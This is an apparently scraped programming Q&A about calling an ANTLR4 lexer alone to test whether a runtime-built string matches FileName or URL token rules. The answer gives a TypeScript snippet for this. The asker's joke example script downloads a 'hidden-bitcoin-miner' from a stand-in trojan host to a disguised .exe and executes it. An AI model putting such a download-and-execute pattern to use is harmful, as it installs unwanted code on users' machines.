I have an ANTLR4 grammar that contains tokens for "filenames" and "URLs" but the language also includes strings and string expressions (which might turn out to be filenames or URLs). Is there a good way to call just the tokenizer on some string in my interpreter and see if the string is a filename or URL according to my token rules? I just want to special case those cases where the script I am interpreting has created one of those things on the fly, so I can treat such strings specially.
lexer // this I already have (or something like this)
FileName: ([A-Za-z]':')?('\\'?[-_.A-Za-z0-9]+)+ ;
URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+ ;
Intepreter.java
public boolean isFileName(String string) {
return antlr.lexer.token(string).type == FileName; // this is the magic I want
}
Script // this is what I am looking to understand
# you get cat pictures, I get paid...
url = 'https://trojan-server.com/hidden-bitcoin-miner';
fn = 'c:' + programdirectory() + 'show-cat-pictures.exe';
download(url, fn);
exec(fn);
As I understand the question, you would like your interpreter actions which receives strings which are constructed at runtime, to be able to take advantage of your lexer to determine if those strings are URL or file references.
Something like this:
doDownloadAction(source: string, dest: string) {
if (isFilename(source)) {
One answer would be to just fire up a new lexer fed by your string, the same way you do when you start a parse, but with no parser ... Something like this (in Typescript, sorry it's what I use for ANTLR):
import {LMLexer} from "./LMLexer";
import {CharStreams} from "antlr4ts";
function isFilename(txt: string) {
const stringLexer = new LMLexer(CharStreams.fromString(txt));
return stringLexer.nextToken().type == LMLexer.FileName;
}
for ( const str of [ "C:\\Users\\Tony\\file.txt", "http://stackoverflow.com" ]) {
console.log(str, isFilename(str) ? "is" : "is not", "a filename");
}
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With